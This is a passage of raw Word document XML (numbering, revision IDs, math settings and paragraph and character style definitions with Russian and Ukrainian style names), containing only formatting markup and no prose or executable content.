    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="20"/>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3050"/>
    <w:rsid w:val="0001493A"/>
    <w:rsid w:val="00022520"/>
    <w:rsid w:val="00035D81"/>
    <w:rsid w:val="00050B3E"/>
    <w:rsid w:val="00101F0F"/>
    <w:rsid w:val="00104083"/>
    <w:rsid w:val="00114204"/>
    <w:rsid w:val="00154474"/>
    <w:rsid w:val="00156683"/>
    <w:rsid w:val="0019135A"/>
    <w:rsid w:val="001959A1"/>
    <w:rsid w:val="001B0C5C"/>
    <w:rsid w:val="001D30B9"/>
    <w:rsid w:val="001E6D6B"/>
    <w:rsid w:val="002168FC"/>
    <w:rsid w:val="0023578F"/>
    <w:rsid w:val="002425F2"/>
    <w:rsid w:val="0026169A"/>
    <w:rsid w:val="00274B2E"/>
    <w:rsid w:val="002908D0"/>
    <w:rsid w:val="002934EF"/>
    <w:rsid w:val="002A4B1F"/>
    <w:rsid w:val="002C13E9"/>
    <w:rsid w:val="002E3E8B"/>
    <w:rsid w:val="002F1513"/>
    <w:rsid w:val="003041CE"/>
    <w:rsid w:val="00355D23"/>
    <w:rsid w:val="00376454"/>
    <w:rsid w:val="003A7B15"/>
    <w:rsid w:val="003E0621"/>
    <w:rsid w:val="003E5E9B"/>
    <w:rsid w:val="00402E58"/>
    <w:rsid w:val="00405BD4"/>
    <w:rsid w:val="00445908"/>
    <w:rsid w:val="0046555E"/>
    <w:rsid w:val="00466851"/>
    <w:rsid w:val="00470D46"/>
    <w:rsid w:val="00475839"/>
    <w:rsid w:val="00483689"/>
    <w:rsid w:val="00484499"/>
    <w:rsid w:val="004B547E"/>
    <w:rsid w:val="004D0486"/>
    <w:rsid w:val="004E1666"/>
    <w:rsid w:val="005018F4"/>
    <w:rsid w:val="005027FB"/>
    <w:rsid w:val="00516E88"/>
    <w:rsid w:val="005240D2"/>
    <w:rsid w:val="00524BA9"/>
    <w:rsid w:val="005364C9"/>
    <w:rsid w:val="00543E7D"/>
    <w:rsid w:val="00552D57"/>
    <w:rsid w:val="00556F90"/>
    <w:rsid w:val="00584480"/>
    <w:rsid w:val="005B4CE1"/>
    <w:rsid w:val="005E0233"/>
    <w:rsid w:val="00603AE5"/>
    <w:rsid w:val="00614A79"/>
    <w:rsid w:val="00636AF5"/>
    <w:rsid w:val="0065383C"/>
    <w:rsid w:val="00653BE5"/>
    <w:rsid w:val="006C1B63"/>
    <w:rsid w:val="006C4B4C"/>
    <w:rsid w:val="006F5970"/>
    <w:rsid w:val="00700FE5"/>
    <w:rsid w:val="0072630A"/>
    <w:rsid w:val="007679D8"/>
    <w:rsid w:val="00772CE7"/>
    <w:rsid w:val="00793AC2"/>
    <w:rsid w:val="007A43A6"/>
    <w:rsid w:val="007A5059"/>
    <w:rsid w:val="007A61FB"/>
    <w:rsid w:val="007D796A"/>
    <w:rsid w:val="008016C0"/>
    <w:rsid w:val="00805C82"/>
    <w:rsid w:val="00825D25"/>
    <w:rsid w:val="00870475"/>
    <w:rsid w:val="00877BAF"/>
    <w:rsid w:val="008945BB"/>
    <w:rsid w:val="008B0B5B"/>
    <w:rsid w:val="008C2CCD"/>
    <w:rsid w:val="008E5C9C"/>
    <w:rsid w:val="008F0C58"/>
    <w:rsid w:val="00913708"/>
    <w:rsid w:val="00942EFE"/>
    <w:rsid w:val="00956AC7"/>
    <w:rsid w:val="0096070A"/>
    <w:rsid w:val="00962467"/>
    <w:rsid w:val="0098124E"/>
    <w:rsid w:val="009A35B5"/>
    <w:rsid w:val="009A3D74"/>
    <w:rsid w:val="009C4E6F"/>
    <w:rsid w:val="009F1C8E"/>
    <w:rsid w:val="00A31C28"/>
    <w:rsid w:val="00A419FD"/>
    <w:rsid w:val="00A56DDF"/>
    <w:rsid w:val="00A575E1"/>
    <w:rsid w:val="00A719C8"/>
    <w:rsid w:val="00A75083"/>
    <w:rsid w:val="00A846AF"/>
    <w:rsid w:val="00A92302"/>
    <w:rsid w:val="00A9729E"/>
    <w:rsid w:val="00B43131"/>
    <w:rsid w:val="00B72CB3"/>
    <w:rsid w:val="00B80A77"/>
    <w:rsid w:val="00BA24D7"/>
    <w:rsid w:val="00BA42BB"/>
    <w:rsid w:val="00BF001C"/>
    <w:rsid w:val="00BF1B1F"/>
    <w:rsid w:val="00C10923"/>
    <w:rsid w:val="00C3144E"/>
    <w:rsid w:val="00C4402A"/>
    <w:rsid w:val="00C62CB4"/>
    <w:rsid w:val="00C77A4D"/>
    <w:rsid w:val="00C86D02"/>
    <w:rsid w:val="00C92CC5"/>
    <w:rsid w:val="00CA572F"/>
    <w:rsid w:val="00CA7357"/>
    <w:rsid w:val="00CE1AA4"/>
    <w:rsid w:val="00CE38CE"/>
    <w:rsid w:val="00CE4163"/>
    <w:rsid w:val="00D16E1B"/>
    <w:rsid w:val="00D43473"/>
    <w:rsid w:val="00D84A9A"/>
    <w:rsid w:val="00DA4C15"/>
    <w:rsid w:val="00DB15F3"/>
    <w:rsid w:val="00DE61AE"/>
    <w:rsid w:val="00E06BBF"/>
    <w:rsid w:val="00E10BF3"/>
    <w:rsid w:val="00E23F84"/>
    <w:rsid w:val="00EB2BAE"/>
    <w:rsid w:val="00ED2EBE"/>
    <w:rsid w:val="00EE2160"/>
    <w:rsid w:val="00F12CDD"/>
    <w:rsid w:val="00F16A64"/>
    <w:rsid w:val="00F33855"/>
    <w:rsid w:val="00F42E62"/>
    <w:rsid w:val="00F63050"/>
    <w:rsid w:val="00FB6169"/>
    <w:rsid w:val="00FC57FB"/>
    <w:rsid w:val="00FD3159"/>
    <w:rsid w:val="00FF6E1E"/>
  </w:rsids>
  <m:mathPr>
    <m:mathFont m:val="Cambria Math"/>
    <m:brkBin m:val="before"/>
    <m:brkBinSub m:val="--"/>
    <m:smallFrac m:val="0"/>
    <m:dispDef/>
    <m:lMargin m:val="0"/>
    <m:rMargin m:val="0"/>
    <m:defJc m:val="centerGroup"/>
    <m:wrapIndent m:val="1440"/>
    <m:intLim m:val="subSup"/>
    <m:naryLim m:val="undOvr"/>
  </m:mathPr>
  <w:themeFontLang w:val="uk-UA"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A9C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3131"/>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qFormat/>
    <w:rsid w:val="00BA24D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00BA24D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00BA24D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>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06BBF"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BF1B1F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a5">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BF1B1F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BF1B1F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a7">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BF1B1F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hps">
    <w:name w:val="hps"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003A7B15"/>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="003A7B15"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:rsid w:val="00BA24D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="ru-RU" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:rsid w:val="00BA24D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="ru-RU" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:rsid w:val="00BA24D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="ru-RU" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BA24D7"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BA24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Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="000080"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTML0">
    <w:name w:val="Стандартный HTML Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="HTML"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BA24D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="000080"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="ru-RU" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="Название объекта1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="00A419FD"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="120" w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:qFormat/>
    <w:rsid w:val="00CE1AA4"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
      <w:i/>
      <w:iCs/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00104083"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ac"/>
    <w:rsid w:val="0072630A"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ac">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ab"/>
    <w:rsid w:val="0072630A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ru-RU" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel39">
    <w:name w:val="ListLabel 39"/>
    <w:qFormat/>
    <w:rsid w:val="0096070A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00CE4163"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE4163"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE4163"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE4163"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="ae">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00B80A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linecode">
    <w:name w:val="inlinecode"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="004E16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3131"/>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qFormat/>
    <w:rsid w:val="00BA24D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00BA24D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00BA24D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>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06BBF"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BF1B1F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a5">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BF1B1F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BF1B1F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a7">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BF1B1F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hps">
    <w:name w:val="hps"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003A7B15"/>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="003A7B15"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:rsid w:val="00BA24D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="ru-RU" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:rsid w:val="00BA24D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="ru-RU" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:rsid w:val="00BA24D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="ru-RU" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BA24D7"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BA24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Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="000080"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTML0">
    <w:name w:val="Стандартный HTML Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="HTML"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BA24D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="000080"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="ru-RU" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="Название объекта1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="00A419FD"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="120" w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:qFormat/>
    <w:rsid w:val="00CE1AA4"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
      <w:i/>
      <w:iCs/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00104083"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Body Text"/>
